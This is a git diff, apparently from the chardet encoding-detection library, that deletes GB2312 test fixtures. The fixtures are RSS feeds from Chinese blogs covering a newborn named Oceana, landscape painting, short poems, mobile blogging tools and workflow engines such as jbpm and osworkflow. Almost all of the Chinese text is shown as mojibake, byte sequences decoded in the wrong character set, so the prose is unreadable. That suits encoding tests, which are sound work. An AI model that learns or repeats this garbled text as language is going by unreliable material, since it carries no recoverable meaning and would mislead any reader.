    ·¢ֿײ±״׀כׂ×ֹטײֳ2¸צ»·¾³±הֱ¿²ִֵֶפ¶¯ִֻ´רµִjboss·‏־סֶק
    java_home jdkִ¿ֲ¼
    jbpm_home jbpm½גׁ¹ִ¿ֲ¼
    2.bin\StartJbpmServer.bat ֶפ¶¯ֻׁׂ¾­ֵהײֳ÷ֳµִִײֳµִjboss
    ·ֳ־ְ‎׳׃£÷
    ::URL::http://localhost:8080/jbpm/userShowHome.do
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    open source¹₪׳קֱקׂ‎ַזּ½ֻק http://www.blogcn.com/user3/chen56/blog/282107.html osworkflow
    ofbiz
    obe
    jbpm
    ׁ¡ְ´ׁ¡ָ¥ֽ£ֱפװofbiz÷ֽosworkflowֹֿ£¬ofbiz±ָ½ֿ±ך׳¼»¯£¬¹תִµִ׃ֳ»§ׂ²÷¶א£¬osworkflowֻהָ»²»±ך׳¼£¬ׂ²°₪¹‎ֲמ£¬µ«ׂע־×ַOpenSymphonyµִ׳קֶ·£¬¶רַׂ÷ֳֿס±ָ½ֿ¼עµ¥£¬ֻשׂװ¾צ¶¨ׂ²װׂ»ֲֿ.

    1.osworkflow:¾­¹‎1ּלµִּ½ֻק£¬·¢ֿײֻ²¢²»ֿסֿכֿףµִִַׁש÷ֳ£¬ִַׁש¼עµ¥£¬±ֶָנwebwork1.3,webwork2.0µִ¹׃ֳ¾­ׁיְ´ֻµ£¬ֻ¼עײ±ּ«װד¸גֱֻ£¬ֲֿװ״cvs°ז±¾÷ף£¬µׂ»¸צִּׁגַ£¬build±¨´ם£¬ײ»÷ֳֹ¾µפֿא¹״µְִא(¼¯ײ׀װejb²¿·ײ)£¬µ2¸צִּׁגַ־ִµµ÷װד¸ג£¬±ֶָנ¾­µהµִhibernateְ´ֻµ£¬ּ«.....;µ3¸צִּׁגַ£¬־ַׂ·סׂ×ײ¹₪±א׀´xml־ִµµְ´µֿײֳ¿¸צ¹₪׳קֱקµִ¶¨ׂו£¬°¡°¡£¬־ׂױזµִ÷ְ£¬־ׂױזµִ²»ֿכ»¨ױױׂ»ּלµִ±¼ה»¹ׂ»־ֻש»ס£¬ױגֳָ־ֿׂכֶנ׃׀¸צֱָֻפׁװֻµ£¬¶א¸ר׀©׀¡ֽ¼£¬¶א¸ר׀©hello,²»ׂ×ױָױ¼ֲתֶ×÷ךֲ£¬־ֳַׂױזµִ²»ֿכ¿´¡£
    2.ofbiz. ֻµµ»°£¬ֻּ«¸´װ׃ֱֻ£¬¹ג¿´ֻµִׂ»´ף־ִµµ־ׂ¶¼²»ָּ׀ִ¼ּ׀רװֻµִֽרױ¾ֹֽֿ£ֱפֲָֿ¥£¬־ׂײ»ַֿכµֿײׂ»¸צ±ָ½ֿ¼עµ¥µִ¹₪׳קֱקֿµֽ³£¬ּלִִ£¬ֻ÷ֳֿס²ִ×¶¼׃׀£¬»¹ֲַֿ»״°ֹ

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    hibernate¼׃ָכjbossֱֻ http://www.blogcn.com/user3/chen56/blog/285759.html jboss¾צ¶¨׃ֳhibernateְ´´תּזֻµִjdo£¬ױגֲֿsun¿ֹ¾ֽ¸²ֱֻׂ
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    \ No newline at end of file diff --git a/chardet/tests/GB2312/cindychen.com.xml b/chardet/tests/GB2312/cindychen.com.xml deleted file mode 100644 index 562cd3b..0000000 --- a/chardet/tests/GB2312/cindychen.com.xml +++ /dev/null @@ -1,250 +0,0 @@ - - - - - - - CindyChen.com - http://www.cindychen.com/dynamic - [ Cindy, Oceana and Allan ] - Sat, 06 Aug 2005 08:37:54 +0000 - http://wordpress.org/?v=1.5 - en - - - Oceana µִ³צֹת - http://www.cindychen.com/dynamic/?p=108 - http://www.cindychen.com/dynamic/?p=108#comments - Fri, 25 Mar 2005 23:00:46 +0000 - Allan - - Creation װ­´´ - http://www.cindychen.com/dynamic/?p=108 - - window.document.getElementById('post-108').parentNode.className += ' adhesive_post';

    Oceana With Mom

    -

    ½סּל Oceana ³צֹת׃ְֳ¹ת¾ֹ½נֹ½¶שֽ¯ׂ½װ÷¡£׀¡±¦±¦µִֹתָױ׃כֲטֲטµִֹתָױֿא¸פֱ½ּל£¬ײ׀־ִָ¡ֳ־גװֶֽ₪£¬ָ¡ׂג׃ֻ®ִ«ֹ½ֻ®µִֹמװ¶ׂג¾³£¬ֽ¬¡¾־װֶֽ₪¡¿¡£

    -

    Oceana װ´׃ֿ£ְ°׃ן£¬ׂג־ס°װ´׳װ÷£ׁף¡±£¬׀³ׂפ£÷ֵ·ֿ£°²ִָ¡£

    -

    µ±»₪¿¿×¼¸רֻ‎ֿ´ֽ·µִ±÷ע Oceana ׂע÷¦ֲֵ¶ר¿ִײֱֶֻנְ´¡£¡°Baby£¬¹װ£¬²»¿¡±£¬ּ‎µ½ֱֲֻטֲטלֿ₪µִֹשׂפ£¬÷¿ל»ײ¸´ֱֶֻ½¾²¡£

    -

    װֻז÷ףµֱִ½ּלְן־ׂ±±¿ּ¿ּ״÷עװּ«ּ«÷ֽ÷¢׳׃µִֹם±£¬װׂ½װ÷µִ¸¨µ¼ֲֿֿ₪׀ִµִ¿×¼ֱַֻ°ֻש־´׃׀µְִת³ּ£¬־×ָֻ¸¸ִ¸¡£ֳ¿ּלְטֳקְ´ֱµִ±÷ע£¬µ±ּ«ּ«÷ֽ÷¢׳׃ללµִֻ¯ֲֿ£¬־ׂ¾ֽ´©¹‎ֻ¯ֳ־ײ׀³ַ׀£¬־ָֻµִ´ף½ײ׀¡ֿן£¬ְ´µ½־ֳֳַׂז÷£µִ׳¡ֻש£¬ָ¡¼°־ֳַֻׂש׀טׂ×µִ־ןֶ·£¬ָ»÷ף÷¿לµִ»״µ½ּ«ּ«÷ֽ÷¢׳׃ֹם±£¬½רֳֵַ°ׂ»ײ±µ£׀ִ׳ֵ÷¢׳׃׃׀ֳ»׃׀׀ׁ£¬׃׀ֳ»׃׀¿ִײ£¬׃׀ֳ»׃׀³³׀ׁ׀יָץµֲִטֲט¡£

    -

    Little Oceana

    -

    ÷¢׳׃³צֹת÷ף²ֳֵָָֻ¸׀¾ץµ½¸¸ִ¸µִ²»ׂ׳£¬ׂװ¼°¼¸®ִךְ´²»׀¸µִֵ¬ֱ¦÷ֽ׀ִׁס£װֻז÷ףµִ¼¸ּל£¬־ׂײױ׃ֳִֶנֱֻµח»°£÷¡°ֲט£¬׀»׀»ִד°ׁ־ׂ´׃ױגֳ´׀¡¸§ׁר´ף¡£¡±

    -

    ֱ½ּל÷ףµִׂ»װח£¬־ֳַׂׂ»¼ָׂ‎¿ֶָ²»¼°´‎µִױְם¶«־ק£¬׳¼±¸»״¼ׂ¡£³µ׳׃´©ֻףװ½נֳֵ¹«װ°µִ²׃ְֳׁפ¹גְן£¬װ״׳ֵ׀ׂ¸£¡¢װ״׳ֵ»¶ְײ£¬ֽ¬ׁשׂ²װ״׳ֵ¼±ַ׀÷ֽ²»°²£¬׀ֲ°ײ°ײֲטֲטµִּ״ג׀ִַי¡£

    -

    ¡ץ ¶‏ֱדֱד־וִך£¬׃ְֳ¹ת¾ֹ½נֹ½

    -

    ===================

    -

    ¡÷¸׀׀»¹״ַ׀׳ֵ־ֳַׂµִֵף׃ׁ¡»£÷

    -

    ְּּ«ּ«÷ָֹֽֿת£¬ֿד¸ְֿ»×ַָ£¬־ֱׂשִךַ°µִ·¿¶«¡£ּ«ּ«»³װ׀ֶה¼הְּּ«ּ«לְְֻּֽׂ´¼ְׂן¡£װ־ֳַׂ»״µ½¼ׂµִµׂ»ּלְ´¼ְׂן¿´ֽש£¬´רְ´ֱֱֻ½ײ»»מ¼¦£¬ׂ»½ןֹֿ÷ֳµִֹת½×£¬÷ֽ´ףֵֻּ«»ֶµ°¡£¸׀׀»¶‏ְֿ¶אִךְ´¶װ־ׂµִ²»ֵׂ²»ֶת£¬÷¶א¹״׀ִ÷ֽ¶½´¡£

    -

    Felix Tian ÷ֽ Tracy ·ע¸¾¡£³צװ÷µ±ּל¸ר־ֳַׂ׳¼±¸ֱֻצך׃ד£¬ײם½ֵ£¬÷עֽ·¹½¡£¼¸÷ץ÷ֽ־ֳַֽׂ¬±µ½¼ׂ£¬ׂ»ְ´¾ֽ°ְּׁ׳קֹֿ¹ר¡£÷ףְ´׃ײֹ׃ְ´׳װײֶµִ¾ִֶנ£¬¿ֹ°®µִ÷¢׳׃ֲׂ·‏¡£ֳַֻµִֵ®¶ש±ָ־ֳַׂ´ףֱ½¸צװֲ£¬ױגֳ´¾ֳׂװְ´ Felix ·ע¸¾¸רֱֻ־ֳַׂ÷¶אַ׀ֹםµִ½ּµ¼£¬÷ֽ¹״׀ִ¡£װ´ֻ¸׀׀»¡£

    -

    Allen Luo£¬־ׂµִ׀ײµ¡£¶א´־ְ´¿´ֽ£¬¸ר÷¢׳׃´רְ´׀ם¶אְס־ן÷ל°£¬װׂ½װ÷±»¹¸ר־ֳַׂ׳¼±¸¸גµד¡£ֽ¬±£¬װױגׂ»ִךְן£¬¸רֱֻ־ֳַׂ÷¶א׳ק׀ֲ°ײ°ײµִ¾­ׁי¡¢׀ִµֳ÷ֽ÷¶א¹״׀ִ¡£װ´ֻ¸׀׀»¡£Jeffery Luo ?2004 ִךֱשװֲ³צֹת׃¾ֹ½נֹ½¶שֽ¯ׂ½װ÷¡£

    -

    ְ´׳װ Johnson & Johnson µִ Dan Wang£¬Chih Chang ¶¼¸רֱֻ÷¢׳׃¿ֹ¹µִ÷ל°£¬Chih Chang ׃ײ¸ר־ֳַׂ´ף´ףװצ¼׃ֱֻׂ»´־׀װִע²¼µִ´¢±¸¡£װ´ֻ¸׀׀»¡£

    -

    ְ´׳װ IBM£¬Cisco System£¬Sun Microsystems ÷ֽ Pfizer µִ Karen Liu£¬Winnie Wu£¬Lillian Xu£¬Charles Liang£¬Victor Zhang£¬Lucia Lai£¬Yi Fan£¬Fei Chen£¬Fan Zhang£¬Xiaolin Chen£¬Howard Liu£¬Changqing Zhang£¬Lan Huang£¬Helen Peng£¬Yang Zeng ÷ֽײמ¶א¹ט¹ָ¹₪³ּ¦׀­»בµִֵף׃ֳַׁ¡£´ף¼ׂׂ»ֶנ¸ר÷¢׳׃׳¼±¸µִ׃₪¶ש´²£¬¸ר־ֳַׂµִ¹״׀ִ÷ְֽ´µח¡£װ´ֻ¸׀׀»¡£

    -

    ³₪±² Edgar Chang ·ע¸¾£¬Michael Leng ·ע¸¾ּ״µ״ְ´¿´ֽ£¬¶¼¸ר÷¢׳׃׳¼±¸ֱֻ¹ףײ״µְִס־ן¡£װ´ֻ¸׀׀»¡£ -

    -]]>
    - http://www.cindychen.com/dynamic/wp-commentsrss2.php?p=108 -
    - - ָֹֻתֲ‏²½ - http://www.cindychen.com/dynamic/?p=103 - http://www.cindychen.com/dynamic/?p=103#comments - Mon, 21 Mar 2005 03:00:39 +0000 - Allan - - Creation װ­´´ - http://www.cindychen.com/dynamic/?p=103 - - window.document.getElementById('post-103').parentNode.className += ' adhesive_post';

    װר¼¸÷־±£¬־ֳַֿׂ׀׀׀׃־ףµִ¿ץׂ°£¬
    -װר¼¸÷־±£¬־ֳַׂ²¢¼ח׃²־ּלµִ׳״יµײ®¼ה¡£

    -

    װר¼¸÷־±£¬־ֲֳַׂ‏ֽ¾׃׀ַ¹גµִׁ©װ­£¬
    -װר¼¸÷־±£¬־ֳַׂ¾ֳ׳ר׃¾²ִ¬µִ´ף÷£ײ®±¡£

    -

    ׃ײַװר¼¸÷־±£¬ֿ¦ׁפֲהִ»£¬װװֲֲֿׂר³ס°דµִֹ³ּ²£¬־ֳַׂ°ׁ׀׀µִףפ»נµד¡£

    -

    ¾ֽװ²»װ¶µִ׳עּל£¬־ֳַׂµִֵ®¶ש¿×¼װִדµִֹםּוְן¾²¾²µ״װ׀׃‎£¬
    -¶ר½סּל£¬׃׀׳ֵ´ף÷£µֳִ׳ײµִֻ‎ׁׂ¾­ֶָ²»¼°´‎µִׂ×¼µ½ְֲֳ‏µִׁפ¹ג£¬÷ֽ׃³׳ֵ׳ֹֿ«ֽםֿ¼µִ÷£ֳז¡£
    -ֳקּל£¬ֳָ־ֳַׂׂ»ֶנ»÷²½׃ֱקֻ®ֽ¥װ÷ײ®¼ה£¬־ֳַׂµִ¼ׂװ°¡£

    -

    ¸רֲטֲט£¬÷ֽ½«ׂ×µ®ֹתµִOceana¡£

    -

    ¡ץ ¶‏ֱדֱד־וִך£¬׃ְֳ¹ת¾ֹ½נֹ½ -

    -]]>
    - http://www.cindychen.com/dynamic/wp-commentsrss2.php?p=103 -
    - - ֻ®ִ«ׂג¾³£¬ֹ½ֻ®±¼ַ - http://www.cindychen.com/dynamic/?p=65 - http://www.cindychen.com/dynamic/?p=65#comments - Thu, 10 Mar 2005 19:01:55 +0000 - Allan - - Creation װ­´´ - http://www.cindychen.com/dynamic/?p=65 - - window.document.getElementById('post-65').parentNode.className += ' adhesive_post';

    י»­ֽ¬װ´¡£

    -

    ֳַָֻ¿ִֹ׃¶ר²»¼¡£ָח¹ִ¿´´©ױג׀©»­µִ±םֳז£¬¾ִֽ·¢ֿײֳַֻױזױ‎µְֳִ£¬ױׂµ½ײ׀¹תָֹֻתױׁ§׳מֹמ²דµִױזְם¡£

    -

    ײ׀¹תµְ¼ַׂ¿µקָֻ׃כּלµִ¹״ֿµ£¬µְַ±םֿף±³÷ף¿´²»µ½µִױזµ£¬ֽע־ן׃מײזֱק¶¯ײ®ֶ½÷ג¡£ײ׀¹ת»­¼ׂµִ׳ׂ×ִ¿±ך£¬¾ַֽ±ם´ןױגײײױזµ±³÷ף׳½ֳ‏²»µ½µִ÷ֽ׀³¸׀¡£¿´ף·עׂװָו¼ׂױׁ§µְִם׀װ£¬µְ¼ׂױׁ§µִ¸׀׀װ¡£¸³«£¬׳צ»­£¬¼ִַי׃ֹ½ֻ®ֽ¥װ°¡£׃׀´ף·עװֶ£÷׳םֳֳֹׁ¼ה£¬ְֲָח¸¡ֶ¼¡£

    -

    ײ׀¹תֹ½ֻ®µִׂ×ֻ״£¬¯£¬ֻ®£¬ִ¾£¬ֹ½¡£ֹ½¯ֻ®ִ¾¶¼ַ¼ז¾±םֳז¼°ׂ‏÷¬ׂגׂוµִֿףױק£¬ײ׀¹ת»­²»½צְְֳַצµִֽ¼»­£¬»¹׃׀»­ֽגײ®ׂג¡£µְ¼ׂµִׂץׁפֲ£¬¼´ֽע־ןֿאֹתֿא¿ֻײ®ְם¡£־°´ףµִי·¨»ע»ז»­±״׀כ׃׀ׂץׁפµק÷ֽײ®¸׀£¬װֹת»מ÷ֽׂױץײ׀¾¡׀ִ´ןµ½÷ֽ׀³ֶ½÷גײ®¾³¡£¿´ף·ע£¬׃±£״µִָו¼ֹׂח»בµִֿׁ¹÷ֽ¶א³מֶֹ¸׀µִµְ¼ׂׂױץ¼ׂ¼ה£¬ָ¡µֳ½ַֹ«µִֶ½÷ג¡£

    -

    ּ״ֱ¢¶ְ׀׀µִױֵ׀ס£¬´«ֻµֻ׳ם÷ףװע÷ֵ÷פ¿ס׳£¬»׃±ָפ׃׀ֹסײת£¬ֳָֻ»­±±¼³£¬ּ׀ֵ₪׳×£¬ׂ»ֶר÷ַ³ֹ¡£

    -

    ױװֳֿ¸©£¬װֳֹ¹ֵָֻµ׳ֲֿ־×¹£¬ָ´³ֹ־×ײ׀¹ת׳מײרֳµִ»­¼ׂײ®ׂ»£¬ַֻ¿µק½«י·¨£¬־ִׁ§÷ֽ»ז»­ָ÷ֿ־×ׂ»¡£³ֹ־×ֽש÷ף‎°ִך¿´ף·עµְִםֿכ¾³½ח¡£װ²¿·ײ׳קֶ·ְן£¬׃ֳֿ¡ט¼ע±£¬±ם´ן³צ¹ֲ¼ֵ£¬ׁׂ¼°ִ׀ִ¶װֹ½ֱײֿחׂ°µִ¿ֽ£¬»½ֶנׂ»ײײ׀ִ¾³µִֿףױקׂגׂו£¬װ¶´ף׃ֻשֳט»זµִֿײµ¡£

    -

    ִװ£¬װעׁ¡װסֱֻֿא·´µֲִ·£¬¾¾ר־×¹£¬ׁ­¼£׃־ו÷‏ָ‎ֱר¼ה¡£ֻׂװַ³ִ«ֹֿײ½£¬±·¨ֻֿֿ¸¿אֹ¬£¬׃ֳ¼ע¶ּµִ´¿ּּֿץ£¬ֳט»ז³צׂ»ִ»ִ»ֿפֹ×£¬¼ֵ¾²׃כ¹ֲ¶ְ¡£µ÷ֹֿµִֹֻיֿףױקֻ׳װ¼÷÷ֽ־ִֵָֻף׃ׁ¡£׃׀ָֻ־£¬»­ײ׀÷־ׂװ´׃²»¼ָֻ׃°¡£ֻ»״´נֻµ£¬־ׂµָֻש´¦ײ®ְ£¬ָח÷־׃׀ָֻ¡£¶װ׃ִװ£¬÷ֽ÷ף´ת¶א‎¿´ף·ע»­¼ׂ¶רׁװ£¬¾°־ןַ׀ִ¾³µִ׀´ױױ¡£׀ִ³ֿׂגײ¿¡£

    -

    ָח¹ֿ¸¿´»ז»­£¬¿ֹׂװ·¢ֿײ¿´ף·עµִָו¼ׂױׁ§£¬¿׳׳׃½ָֻּ׳נײ״¹ֵ¥ָֽֿֿ£¬ׂע´ֻ־ִָֻ»­¼ֽׂשֽש׳סׁ­ַ°³¯´ף¦µִ·ח¸ס£¬׃׀±ׂ»±ׂ»±ָµ״ֱִ¡¡£ֹס׀־ֳ²ֶֻ¡£¹ֵ¥ָֽֿֿµְֳ´²»ׂ׳µִײ×¶£¬±״׀כױהֿ§÷ֽ·ֲ׀§´ֻֿמ´«ֽ³¡£ײ׀¹ת»­¼ׂׂ‎׃ֳי·¨µִ±·¨£¬ְ´´«´ןײ׀¹ת»׃·¢µִµׂ»·¨װע£¬¼´´«ֹס¡£ׂע´ֻי·¨µִ±םֿײּֿץ¾ֱֽקָכ»ז»­ׂױץײ׀¡£ָֽֿֿ׃׀±־טִ«¸טײ®ֻµ¡£

    -

    ־ִָֻ³יֿף»­µִ´«ֽ³ַָֿ‎ֻױיר£¬׃׀¡°ֲ»­ׂװ׀־ֶֻ£¬¼׃כ¶שֽ¯ֱ¡£¡±

    -

    ±±׳£¬ַװֻ׃ֳֳקֱֱ׀´µµִֹ«²£¬ֳט»זֽגװµִ±םֿףױ¡£¹₪±»­¼¼ַֹ¡£ִֿ׳£¬װעַײ»ׂװ÷ִ«ֳט»זִװױזµױ¡£ֵֵ³ג¹₪±»­¼¼ַֹ£¬ׂעֻ־·¨ּוֿײײ׀¹תׂױץµִ׳ׂ×·¨װע¡°´«´ן±םֿףײ®÷ףֻשׂ‏²״µִױזµ¡£¡±

    -

    ±ָ½ֿ־קׁף»­¹׃ֳµ¥ׂ»µִ¹גװ´£¬ײ׀¹ת»ז»­װעֳַק°µֱק¶¯£¬½»ֿאװֻ׃ֳ£¬ֳ»׃׀µ¥ׂ»µִ¹גװ´¡£ױגײײײ·¨ױ§¿´ײ®ֲַֿ¶װ־ןְםּ״׀װָ±·¦ֱֻ½ג£¬ֶהµָ´ֽ¹ֿװ³צײ׀¹ת¹ת¼ׂ¶װֶרװֹֿת¶¯µִױֶ־ױ¡£

    -

    ׃ֹד׃°£¬ָחַּו»ב£÷װ´ף³¶ָµִ»·¾³ײ׀£¬¹גװ´־´±״ֽ¬װ´£¬ֹ½׃׀ׂץַח£¬ֹ½׃׀׃ךׁ©£¬ֹ½׃׀ֿױ·ו£¬ֹ½׃׀׃ִ¹ָ£¬¸ק¾׃ֶה־»£¬¸קֿװֶה׀־¡£¶רֶהֹ½ׂ²־´±״ׂ»¶¨ַֹ½£¬ֶהֹ½¿ֹ־×־ֹב£¬ֶהֹ½¿ֹ־×½ײ׀½»ֽ¨¡£»·¾³µִֻ²ֿ¢ׁ±הׂװ¼°ׂ×ֻ״µִֽ¨ֽ¸װֻ׃ֳ¿ֹֿאµֳׂזױֳ£¬½»ֿא»װ׃³¡£ָחַ£¬´ֻֽ¼´ֻ»­װע¿ָֹכµֳֳּּ£¬½רµֳ»­ְָ£¬ײָֻ־×ײ®ַדִׂ¡£

    -

    ´ֻֽג־ִָֻ»­¼ֵֵׂ³גµ¥ׂ»ֽ¸׃¡£÷ֽ־ק·½·ח¾°»­²»ֽ¬µִַ£¬ײ׀¹ת»­׳¹ֶהֹסװֿ¶ר·ַ¹ֹֽ¡£ֻשׂװֳ»׃׀µ¥ׂ»µִֿ§µד£¬¹ױװעָחֽ½²½ֲֳָֻ£¬ֻ«ִ¿ֻז¾¹׃־׳¡£11ְ¼ֽµִ»­ְֶ¼ׂ׃׀¡°ֹ½ֻ®½װ׃¦׳װָ«¾ײ¹ײ®£¬ׂװ¹ֶהֳאו¾־¾¡ײ®ָ«ֳ²¡£¡±

    -

    ׀ם¶אײ׀¹ת»­¶¼²ָֹ¡ֶׂ¶¯׃½ַ£¬ֿא»ת÷ֽ¹ּ¶¨׃½ַײ®»­¶¼׳צ²»³צױג°ֿׁ·¡£

    -

    ײ׀¹תµִֹ½ֻ®»­¼ֲׂ‏²½׃ֹ½ײ׀»עֽ¥װ°ײ׀£¬»״µ½י׳ְַ°±ױִ¿³ֱֻ¼£¬»½ֶנֻֻשװִֽנµִ¼ַׂה¼°ֹמ²דַי¸׀£¬׳¹ָ«¾ײ¶ר»­ֹ½¡£¶װ¿´ף·ע¶רׁװ£¬לרֿכ´ע׳ר÷ֽׂױץ´´׳ק־ײ»¿ֹ·ײ¸מ£¬ׂגװ±ֳַַָֻֿµִ׀ֵּץ¡£

    -

    ־קׁף»­ֽשֽשׂװָֻ־ן־×ײקּג,¶ר·ח¾°³£³£ַ±³¾°¡£·´ײ®£¬ײ׀¹ת»­µִֹ½ֻ®ֽשֽש־×ײקּו£¬ֳל׀¡µִָֻ׃ֶ׃־׃ֶה¼ה£¬־×µְ¼ׂµִױּו׳װָ»ֱק¶¯¹ײ®ׂ»²¿·ײ¡£µֳ´׃ױּו¹¹ֽ¼ײ׀²ִֵ¹²ל¶ר³צ¡£¶ְ׀׀µִ׃זָֻ£¬ֶ׃µµִֵ©·ע²½׀׀׃ֹ½¼ה£¬ֻ²»ײר÷¼£µִײֳֹםֶה¼ה£¬ָחֻ®µ־ָכµְײ®ֽפׁף¡£»ע¹ֹ½ֻ®ײ®ְֳ£¬»×ֹ½ײ®ְֳ£¬ּלµ״¾«ֶרײ®ֳ״£¬½װ¿ָֹ¡׃ׂ»»­ײ»ײ׀¡£

    -

    µְ ַ¹ֽע־ןֿאֹתֿא׀־µִ׃מײזֱ¦ֱ¿¡£¶ְ׳ר¾²ֻ¼ׂװµֳµְ¡£

    -

    ¡ץ ¶‏ֱדֱדִִֻך£¬׃ְֳ¹ת¾ֹ½נֹ½ -

    -]]>
    - http://www.cindychen.com/dynamic/wp-commentsrss2.php?p=65 -
    - - ´° - http://www.cindychen.com/dynamic/?p=33 - http://www.cindychen.com/dynamic/?p=33#comments - Tue, 08 Mar 2005 20:47:31 +0000 - Allan - - Creation װ­´´ - http://www.cindychen.com/dynamic/?p=33 - - window.document.getElementById('post-33').parentNode.className += ' adhesive_post';

    ´°ֽג׃ײַ־ו²µִּל¿ױ£¬ׂ»ָחֽש³£¡£

    -

    ־¢·ח»÷»÷½רָכ´°ֱ±£¬
    -ַבַב²¦¶¯¶מֽ·µִ÷·¢¡£

    -

    »ׂ÷לµִּל¿ױ־±־¼£¬
    -װ¶ֹ½¿×¼´׃׃ֿײ׀½¥½¥ָֻֽ¥¡£

    -

    µֶׂ»ײ»ׂ»ײ»µִ¿×¼µדֶנ£¬
    -ֹ½¹ָ¶װֳז³ֱֹֻ׀ַ׀ַµדµדµִ÷£ׁף¡£

    -

    ¡ץ ׂ»¾ֵ¾ֵ¾ִֵך£¬׃ְֳ¹ת¾ֹ½נֹ½ -

    -]]>
    - http://www.cindychen.com/dynamic/wp-commentsrss2.php?p=33 -
    - - ׃־ּ«÷ֶ÷‏ - http://www.cindychen.com/dynamic/?p=32 - http://www.cindychen.com/dynamic/?p=32#comments - Tue, 08 Mar 2005 20:44:44 +0000 - Allan - - Creation װ­´´ - http://www.cindychen.com/dynamic/?p=32 - - window.document.getElementById('post-32').parentNode.className += ' adhesive_post';

    ÷®ֻ×ְהׁ©ּ«÷ֶ׃־£¬
    -ׂ»װֲ³ם׃ךָף±±ײ¡£
    -²׀÷ּ¾ֹׂ¶½װ¾¡£¬
    -־¨׃׀¾¢ײ¦°ֱקֽ·¡£

    -

    ׳דֲִׁ©°ו£¬ײ·צ׃­·ח£¬ׂ»ֹם°׳°ְ³תַנ¡£

    -

    ¡ץ ¶‏ֱדֱדָ‎ִך£¬׃±±¼׃ײ -

    -]]>
    - http://www.cindychen.com/dynamic/wp-commentsrss2.php?p=32 -
    -
    -
    diff --git a/chardet/tests/GB2312/cnblog.org.xml b/chardet/tests/GB2312/cnblog.org.xml deleted file mode 100644 index 78e414c..0000000 --- a/chardet/tests/GB2312/cnblog.org.xml +++ /dev/null @@ -1,95 +0,0 @@ - - - - - - CNBlog:Blog On Blog - http://www.cnblog.org/blog - http://www.cnblog.org/blogvia cnblog.org - info@cnblog.org - zh-cn - - PicostationµִPicoBloggerַ ׂ»¸צֳִָS - http://www.cnblog.org/blog/archives/2004_08_29_cnblog_archive.html#109424958546889584 - PicostationµִPicoBloggerַ ׂ»¸צֳִָSymbian Series 60 µִֶׂ¶¯ֹט±¸·¢²¼Blogµִ¹₪¾£¬ֻײ§³ײ÷¶אײײBlog·‏־ס£¬ֽ¨¹‎ִֻ½«ִָ·¢²¼µ½Blogger.com¡¢Livejournal¡¢TypePad¡¢MT µָµָ¡£ױױPicostationµִֻµ·¨£¬ֳִִָֻדֻז±ֻזµ״µִ·¢²¼Blogִָ¡£

    PicoBloggerׂ²ײ§³ײװblogִָײ׀²וָכֽ¼ֿס÷ֽ׃°ֿס£¬ֹץײֱִ±ָMMS·¢²¼¸´ףֱָ¿µִִָ£¬¶ר²»±״µ£׀ִ¶װַ·ס׀טׂ×·ֵֶתֽ¼ֿסµִ¿¼ֲַ¡£

    ¸ֳ¹₪¾ײ§³ײױג׀©ײ»ת£÷Nokia 7610 Nokia 6600 Nokia 3650 Nokia 3660 and 3620 Nokia 6630 Nokia 6260 Panasonic X700 Samsung SGH D700 Siemens SX1 Sendo X]]>
    -
    - - ³צ°זֹּoreillyֶֽ³צֱֻ¿×·ֵֽ¼יֿמִ¿,װױג¸צֿמִ¿ײ׀²¿·ײֽ¼י - http://www.cnblog.org/blog/archives/2004_08_29_cnblog_archive.html#109405270763030919 - ¿×·ֵֽ¼יֿמִ¿,װױג¸צֿמִ¿ײ׀²¿·ײֽ¼יַֽך ָ«¿×·ֵµִ£¬¿ֹׂװװoreillyµִֽרױ¾ֲֹֿֿװ״µ½ֽךױµח׳׃°ז,ֶהײ׀׃׀ׂ»²¿·ײ׀ֲי£¬׃׀´ף¼ׂלֿ₪µִwe the media¡£ׂ»²¿·ײµִֽ¼י°זָ¨÷ֳֿףַ»ש׃Creative Commonsµִ¡£(־ׂ׳מװחַ´׃BigTiger's blog¿´µ½ֿא¹״µִ½יֹµִ)]]> - - - װ¬¹ףָ½ּװ¡¶ֲם¿ֻֻ¼µִָֻׁ§ֻ¼ֿכ¡·ׂ»יײ׀ײ¸³צ£÷¡°ײ»ַֻµְֽ¶¯÷ֹֽח - http://www.cnblog.org/blog/archives/2004_08_29_cnblog_archive.html#109402128612661638 -
    ׃ֹ׃ָֻµִ·¢ױ¹¾ּוִָ׀־³ֹ׃ּוֿײװְֽ¶¯µִµ¼שײ׀÷ֽװְֽ¶¯¹‎³ּµִֹח»ב¹״ֿµ¹¹½¨ײ׀£¬ׂע´ְֻֽ¶¯ֱִ¦÷ֹֽח»ב¹״ֿµ·¢ױ¹¾ַָֻֽµִ·¢ױ¹µִ¾ּו±םױקִָ¡£ֲם¿ֻֻ¼¹״׃ָֻµְִֽ¶¯ֱִ¦µֲִצַ·ב¸»µִ£¬ָֿ־×ָֻµְִֽ¶¯ֱִ¦ׂװּוֱ¦÷ֽײֱַ¦־×ײקׂ×ִָ£¬»¹°ְ¨¸צּוֱִ¦׃כ¼¯ּוֱִ¦ֿא»¥׳×»¯¡¢ָֻµִ׳װָ»´זװֱִ¦׃כֹח»ב´זװֱִ¦µִ׳×»¯¡¢ָֻµִַ±װֱִ¦׃כµֿײֱִ¦µִ׳×»¯µָ¡£ֲם¿ֻֻ¼¹״׃ָֻµִֹח»ב¹״ֿµµִ·¢ױ¹£¬װע°ְ¨ֱָֻֻµִֹח»ב¶װֿף׀װ¹״ֿµµִָ«ֳזֹת³ֹ¡¢¸צָֹֻח»ב¹״ֿµ·בֲתµִּבֹ‎¡¢ָֻ¶װֹח»ב¹״ֿµ¿״ײֶ׳װ׃ֹ¶ָµָ¡£ׂע´ֻ£¬»ש׃ָֻµְִֽ¶¯ֱִ¦÷ֹֽח»ב¹״ֿµ£¬ֲם¿ֻֻ¼ַ¿µקָֻµִָ«ֳז·¢ױ¹£¬¶ר²»ַײ»·¢ױ¹׳װ¼÷ֱִ¦µִִ³ׂ»·½ֳזָ´ֶ«·ֱֶֻֿהֻ·½ֳז¡£ֲם¿ֻֻ¼ַ¿µקָֻµִָ«ֳז·¢ױ¹»¹װ׃ַ¿µקָֻ׳ק־×ײקּוµִ׳װ¾ץ¡¢׳װװ¸¡¢׳װײקµִ·¢ױ¹£¬¾ַָֻֽµִ׳װ׃ֹ¶רָ«ֳזµִ·¢ױ¹¡£ָח¹ֳ»׃׀ָֻµִ׳װ׃ֹ·¢ױ¹£¬ֳִַ´ָֻµִָ«ֳז·¢ױ¹ׂ²ַ²»¿ִֹµֿײµִ¡£

